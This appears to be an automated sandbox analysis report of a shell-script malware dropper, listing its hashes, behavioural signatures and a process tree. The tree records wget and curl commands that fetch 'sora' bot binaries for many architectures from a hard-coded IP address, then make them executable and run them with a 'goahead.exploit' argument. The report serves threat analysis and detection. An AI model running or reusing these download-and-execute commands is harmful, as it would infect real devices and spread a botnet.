Analysis
-
max time kernel
27s -
max time network
28s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 02:43
Static task
static1
Behavioral task
behavioral1
Sample
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
-
Size
2KB
-
MD5
ee0d49be644dae49f775256609f1218e
-
SHA1
036f36cd4a7dc0abe7ea6315e9f2524f35a6c73d
-
SHA256
c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2
-
SHA512
1df66cf2794390f84d3c0e20e24991c720c852c38a3b1984e8c120d1310f492ffad43ae4248e72cbd00968ec4a3db753f4a748147ac2295ad7a83f46146374c8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 775 chmod 862 chmod 874 chmod 787 chmod 831 chmod 868 chmod 908 chmod 781 chmod 797 chmod 815 chmod 892 chmod 764 chmod 849 chmod 880 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 765 robben /tmp/robben 776 robben /tmp/robben 782 robben /tmp/robben 788 robben /tmp/robben 799 robben /tmp/robben 816 robben /tmp/robben 832 robben /tmp/robben 850 robben /tmp/robben 863 robben /tmp/robben 869 robben /tmp/robben 875 robben /tmp/robben 881 robben /tmp/robben 893 robben /tmp/robben 909 robben -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 767 wget 771 curl 774 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Processes
-
/tmp/c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh/tmp/c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh1⤵
- Writes file to tmp directory
PID:739 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:742
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Reads runtime system information
PID:750
-
-
/bin/catcat sora.x862⤵PID:762
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-QnmZce2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:765
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:767
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:771
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:774
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-QnmZce2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:776
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:778
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Reads runtime system information
PID:779
-
-
/bin/catcat sora.x86_642⤵PID:780
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-QnmZce2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:782
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:784
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Reads runtime system information
PID:785
-
-
/bin/catcat sora.i4682⤵PID:786
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-QnmZce2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:788
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:790
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Reads runtime system information
PID:791
-
-
/bin/catcat sora.i6862⤵PID:796
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-QnmZce2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:799
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:802
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Reads runtime system information
PID:805
-
-
/bin/catcat sora.mpsl2⤵PID:813
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-QnmZce2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:816
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:818
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Reads runtime system information
PID:822
-
-
/bin/catcat sora.arm42⤵PID:828
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-QnmZce2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:832
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:834
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Reads runtime system information
PID:838
-
-
/bin/catcat sora.arm52⤵PID:847
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-QnmZce2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:850
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:852
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Reads runtime system information
PID:856
-
-
/bin/catcat sora.arm62⤵PID:860
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-QnmZce2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:863
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:865
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Reads runtime system information
PID:866
-
-
/bin/catcat sora.arm72⤵PID:867
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-QnmZce2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:869
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:871
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Reads runtime system information
PID:872
-
-
/bin/catcat sora.ppc2⤵PID:873
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-QnmZce2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:875
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:877
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Reads runtime system information
PID:878
-
-
/bin/catcat sora.ppc440fp2⤵PID:879
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-QnmZce2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:881
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:883
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Reads runtime system information
PID:884
-
-
/bin/catcat sora.m68k2⤵PID:890
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-QnmZce2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:893
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:896
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Reads runtime system information
PID:900
-
-
/bin/catcat sora.sh42⤵PID:907
-
-
/bin/chmodchmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-QnmZce2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/robben./robben goahead.exploit2⤵
- Executes dropped EXE
PID:909
-